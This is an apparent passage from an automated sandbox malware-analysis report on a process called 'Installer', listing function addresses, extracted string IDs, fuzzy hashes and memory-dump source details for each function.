                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: F]EH$Uo#_$[:
                                                                                                                                                                                                                                                    • API String ID: 0-1241761701
                                                                                                                                                                                                                                                    • Opcode ID: 36fd720ed8d6823c32771bfe1625822d316a9a8a9853b2f702ca3dab545584eb
                                                                                                                                                                                                                                                    • Instruction ID: 2ffdbc668ff94129819068ea1ed793c8dcaee62cf96c99cff00229467904dbcf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36fd720ed8d6823c32771bfe1625822d316a9a8a9853b2f702ca3dab545584eb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF5168A4A093A18BD3188F2994A0337FFE09FE3305F58956EF4D68B381D67D8804C756
                                                                                                                                                                                                                                                    Function 0042D49A Relevance: 4.0, Strings: 3, Instructions: 218COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: F]EH$Uo#_$[:
                                                                                                                                                                                                                                                    • API String ID: 0-1241761701
                                                                                                                                                                                                                                                    • Opcode ID: 4ffe94aedec0ee075d16d5ca1e3e2f6a888b7093a5e75b5c49b8c05ae89e53b4
                                                                                                                                                                                                                                                    • Instruction ID: 0de7b66c928a3350a22ba3e9d9bb6f9889ec970dbe198820fd9a8fcea16b9496
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ffe94aedec0ee075d16d5ca1e3e2f6a888b7093a5e75b5c49b8c05ae89e53b4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 785179B4A093A18BD3098B2994A033BFFE09FD3305F58955EF4D68B381D67D8804C756
                                                                                                                                                                                                                                                    Function 0042D64C Relevance: 4.0, Strings: 3, Instructions: 217COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: F]EH$Uo#_$[:
                                                                                                                                                                                                                                                    • API String ID: 0-1241761701
                                                                                                                                                                                                                                                    • Opcode ID: 75d27e60beb243e9c3408e842da1e13c30d6f828246f723bff5a19cc79804c01
                                                                                                                                                                                                                                                    • Instruction ID: 61dd48889cf855c270f3eeb86a6ea88740ffcb6d6eea17eed08dc00024456671
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75d27e60beb243e9c3408e842da1e13c30d6f828246f723bff5a19cc79804c01
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 355166B0A093A18BD3088B2894A033BFFE09FD3305F58956EE4D68B381D67D8804C756
                                                                                                                                                                                                                                                    Function 0042BBE3 Relevance: 3.9, Strings: 3, Instructions: 198COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ($0' :$g
                                                                                                                                                                                                                                                    • API String ID: 0-2894493355
                                                                                                                                                                                                                                                    • Opcode ID: 127e783f08fa03dc1526e31b0ee453c704f7bbf9130a5869e8a9e0373e6e0c28
                                                                                                                                                                                                                                                    • Instruction ID: 82fddf1245ea9785951fab6b19b0e18f29a6b2d5cfba79b1b40d0bceeec468ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 127e783f08fa03dc1526e31b0ee453c704f7bbf9130a5869e8a9e0373e6e0c28
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F651F26531D3D24BDB298F3598653FBBBE2DB93304F5C496DC0CA87282DB3984068796
                                                                                                                                                                                                                                                    Function 0042BC53 Relevance: 3.9, Strings: 3, Instructions: 177COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ($0' :$g
                                                                                                                                                                                                                                                    • API String ID: 0-2894493355
                                                                                                                                                                                                                                                    • Opcode ID: 60e313afede76628c7910cabc6e2c24f69d92bdb4d83de5ca37a98b6c8095f76
                                                                                                                                                                                                                                                    • Instruction ID: ab1398b02a8a7281b2a45260371c8ad29eb33f1a8b52771f88fa1d3f98cb6ccb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60e313afede76628c7910cabc6e2c24f69d92bdb4d83de5ca37a98b6c8095f76
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7341D37061C3D28ADB394F3494293FBBBE1DB93304F5849ADC0C987282DB394106879A
                                                                                                                                                                                                                                                    Function 0042BB19 Relevance: 3.9, Strings: 3, Instructions: 137COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ($0' :$g
                                                                                                                                                                                                                                                    • API String ID: 0-2894493355
                                                                                                                                                                                                                                                    • Opcode ID: b96d02e88c0a58c109baa3d55930f9ba5c7ef7b50bcf42591470675d5c739625
                                                                                                                                                                                                                                                    • Instruction ID: be085471faecc0e2517363bcce5a64cf4fe5eb468f05be4f0a344c56f6f7ae45
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b96d02e88c0a58c109baa3d55930f9ba5c7ef7b50bcf42591470675d5c739625
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9031F46021C3D28ADB394F3494593FBBBE1DB93304F98496EC0C987292CB394106CB5A
                                                                                                                                                                                                                                                    Function 00427917 Relevance: 3.8, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: AL7$KNCI$X
                                                                                                                                                                                                                                                    • API String ID: 0-2162001628
                                                                                                                                                                                                                                                    • Opcode ID: 2d3aa0b5dc2908d3afa6b89691fa5862a8d4e30f209e389472789df3b9353774
                                                                                                                                                                                                                                                    • Instruction ID: c1efb55ec262374922805156c2cb0b218ab5fdccaf3554e53de449f270c0e8b1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d3aa0b5dc2908d3afa6b89691fa5862a8d4e30f209e389472789df3b9353774
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27F0A9B011D3909BE350AF69969065FFBF8EF96320F502A2CFAD49B242C334C0018F46
                                                                                                                                                                                                                                                    Function 0042788F Relevance: 3.7, APIs: 2, Instructions: 692COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427B68
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00427C72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 237503144-0
                                                                                                                                                                                                                                                    • Opcode ID: 5a29734b277b2e9b8358fa5ecbf45429ecc3aeb30d586a3974802221ebf8515b
                                                                                                                                                                                                                                                    • Instruction ID: 247fa94026213c22a70afdfae02ba9db67c982c8a71b05e85d253056af3d2863
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a29734b277b2e9b8358fa5ecbf45429ecc3aeb30d586a3974802221ebf8515b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE324376A0C350CFD3108F29E88072EB7E1EF86314F19867DE99597391DB74E9018B8A
                                                                                                                                                                                                                                                    Function 00427A3F Relevance: 3.7, APIs: 2, Instructions: 668COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427B68
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00427C72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 237503144-0
                                                                                                                                                                                                                                                    • Opcode ID: 5f34821947dbddbcf30ce221ada36af6612115f31c02cf9bf287c06683c0a9f8
                                                                                                                                                                                                                                                    • Instruction ID: 345d3084dec7a3450128b1aec3c018c2bdda3eb4c1cf0a9ab4d6be0b7558935f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f34821947dbddbcf30ce221ada36af6612115f31c02cf9bf287c06683c0a9f8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B324476A0C350CFD3248F29E88071EB7E1EF86314F19867DE99597391DB34E9018B8A
                                                                                                                                                                                                                                                    Function 004146A0 Relevance: 3.5, Strings: 2, Instructions: 1049COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: C=$D]+\
                                                                                                                                                                                                                                                    • API String ID: 0-9813778
                                                                                                                                                                                                                                                    • Opcode ID: b6a84abd2839b95c80c6a07005a96518be76de580fe6589eb625db292694bc81
                                                                                                                                                                                                                                                    • Instruction ID: cd0c9bfdefc84b350a232778b7e2c0df60d2e4748fd71e5e92d8149e0538340d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6a84abd2839b95c80c6a07005a96518be76de580fe6589eb625db292694bc81
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F5223746093009BD7149F24EC81BABB7A1FFCA314F14492DE581973A1E738E946CB9A
                                                                                                                                                                                                                                                    Function 0041C900 Relevance: 3.1, Strings: 2, Instructions: 645COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: !;P$3;P
                                                                                                                                                                                                                                                    • API String ID: 0-2962031992
                                                                                                                                                                                                                                                    • Opcode ID: d5e4f07c2787d845fb65e5a98866e9f50cd63d594b10ba433d030bc227476e3b
                                                                                                                                                                                                                                                    • Instruction ID: 40303969f341cab0190b7ffaf639a3eee83e9144fdcd8cc0720d9d15948ab37b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5e4f07c2787d845fb65e5a98866e9f50cd63d594b10ba433d030bc227476e3b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 211275B2A50616CFCB048F68CC812EBBBB2FF55314F19856DD445AB391D338A892CBC4
                                                                                                                                                                                                                                                    Function 004227E0 Relevance: 2.9, Strings: 2, Instructions: 428COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: .8$10
                                                                                                                                                                                                                                                    • API String ID: 0-814249144
                                                                                                                                                                                                                                                    • Opcode ID: 32d5e060f1d652f2465254695c79ef22fd30b916abb47e7b2ed794c844420618
                                                                                                                                                                                                                                                    • Instruction ID: 6ecdc93fcc257772eba09db5fa8149ff251927af64ff6b659e51a55be0f97946
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32d5e060f1d652f2465254695c79ef22fd30b916abb47e7b2ed794c844420618
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23C15B717083209BD724DF28D95163BF3E1EF91324F49892EE89697391E7B8E801C35A
                                                                                                                                                                                                                                                    Function 0041966B Relevance: 2.8, Strings: 2, Instructions: 250COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 54+*$L4
                                                                                                                                                                                                                                                    • API String ID: 0-1428210418
                                                                                                                                                                                                                                                    • Opcode ID: b8bc600fa4d70428250f3d62d1b0c4869235ddbcb5ebdaa6d2aff065ca03eef8
                                                                                                                                                                                                                                                    • Instruction ID: b6df84392dfbbf32e231f27527d6559e31459186b39928bbcdb8bfc668edbfbe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8bc600fa4d70428250f3d62d1b0c4869235ddbcb5ebdaa6d2aff065ca03eef8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6691D1B56083419FD714CF29D8A1BABB7E2BFD5304F14492DE48A83251D738EC46CB5A
                                                                                                                                                                                                                                                    Function 00416C77 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 54+*$MnA
                                                                                                                                                                                                                                                    • API String ID: 0-3213807796
                                                                                                                                                                                                                                                    • Opcode ID: f66647ee9ab0e35559181c8ae5c5de11cfb4496e1a8266f8898e9403b5961e50
                                                                                                                                                                                                                                                    • Instruction ID: 6e584b5c880dee98a52d54ab6d2185dce934cf6ba25eebf79510f41c98d88442
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f66647ee9ab0e35559181c8ae5c5de11cfb4496e1a8266f8898e9403b5961e50
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0051F67420D3508BD7288B14D9D0BABB7A2EFCA318F25967DD58697291C335E843C78E
                                                                                                                                                                                                                                                    Function 0043EE50 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: '}$yz
                                                                                                                                                                                                                                                    • API String ID: 0-4283282396
                                                                                                                                                                                                                                                    • Opcode ID: f79d7379e376645b73c42350e5ee51e8a145ed93f69b725fee394d330310c919
                                                                                                                                                                                                                                                    • Instruction ID: 6c98babec1c2cee739f789cf685c2ea4349774288cd61dce89ebb6089c752d52
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f79d7379e376645b73c42350e5ee51e8a145ed93f69b725fee394d330310c919
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A91132759002298FCB00CF54D8D06EE77B2FF41344F151569D851BB2A0CB389946CB99
                                                                                                                                                                                                                                                    Function 004402B0 Relevance: 2.0, Strings: 1, Instructions: 703COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: cu16
                                                                                                                                                                                                                                                    • API String ID: 0-1393213281
                                                                                                                                                                                                                                                    • Opcode ID: 9ac8e299f1cf1d63ed86c6bd82d1a592ff0dcb59a841c00e2249b3a717890619
                                                                                                                                                                                                                                                    • Instruction ID: cc1519bfc60c4b12a942df2b806186209cadf443f4b6312827fcc7d0bb8de627
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ac8e299f1cf1d63ed86c6bd82d1a592ff0dcb59a841c00e2249b3a717890619
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB22363A608251DFC704CF28D8A126AF7F2FB8A314F09857ED98987351D734E955CB89
                                                                                                                                                                                                                                                    Function 004403D0 Relevance: 1.8, Strings: 1, Instructions: 594COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: cu16
                                                                                                                                                                                                                                                    • API String ID: 0-1393213281
                                                                                                                                                                                                                                                    • Opcode ID: 0068fcea1fcce90b3d7b75575ae24fd46d4f308cccbdaad663dec9647c00860c
                                                                                                                                                                                                                                                    • Instruction ID: ab146c73076e2240b060154e7353531ea1e8eb1c5403ea302177df520b4c5a47
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0068fcea1fcce90b3d7b75575ae24fd46d4f308cccbdaad663dec9647c00860c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D120339608250DFC708CF28E8A166AF7F2FB8A314F09857EE98987351D734D955CB89
                                                                                                                                                                                                                                                    Function 00440550 Relevance: 1.7, Strings: 1, Instructions: 478COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: cu16
                                                                                                                                                                                                                                                    • API String ID: 0-1393213281
                                                                                                                                                                                                                                                    • Opcode ID: a8b42d00aa42b6c5f4fdbec2012c9a4f829a243eac6bcdfeac6ada73ec91b821
                                                                                                                                                                                                                                                    • Instruction ID: b47343fc74fa199a2dd3296f085def7190a0f10b9a04de121b961ff035c16150
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8b42d00aa42b6c5f4fdbec2012c9a4f829a243eac6bcdfeac6ada73ec91b821
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F10136608251DFC704CF28D8A066AF7F2FB8A318F09897EE58987351C735E955CB89
                                                                                                                                                                                                                                                    Function 00440690 Relevance: 1.7, Strings: 1, Instructions: 442COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: cu16
                                                                                                                                                                                                                                                    • API String ID: 0-1393213281
                                                                                                                                                                                                                                                    • Opcode ID: 2fdcadc8431d5e275e97618014f6d9204e5a36a54ec6d05914a11fb32c429fef
                                                                                                                                                                                                                                                    • Instruction ID: a8adab88cd6467e8744eccda8f8671d0fd7897d1ea11a103ef712ebcb60b2b94
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fdcadc8431d5e275e97618014f6d9204e5a36a54ec6d05914a11fb32c429fef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CE100366082508FD304CF38D89066BFBE2EB8A314F09897EE99987351D735D905CB89
                                                                                                                                                                                                                                                    Function 00440600 Relevance: 1.7, Strings: 1, Instructions: 441COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: cu16
                                                                                                                                                                                                                                                    • API String ID: 0-1393213281
                                                                                                                                                                                                                                                    • Opcode ID: 7970cd6754f9a29d7eb6efe6f2f2c38251dbb01199b4c91cf1d898bcd2063352
                                                                                                                                                                                                                                                    • Instruction ID: a6b8655c2d4fe843f733019638999d7a326d799a2e10267b81ba0de51ceb402d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7970cd6754f9a29d7eb6efe6f2f2c38251dbb01199b4c91cf1d898bcd2063352
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41E10136608250DFD704CF28D8A066AFBE2FB8A314F09897EE59987351C735E915CB89
                                                                                                                                                                                                                                                    Function 0041C561 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
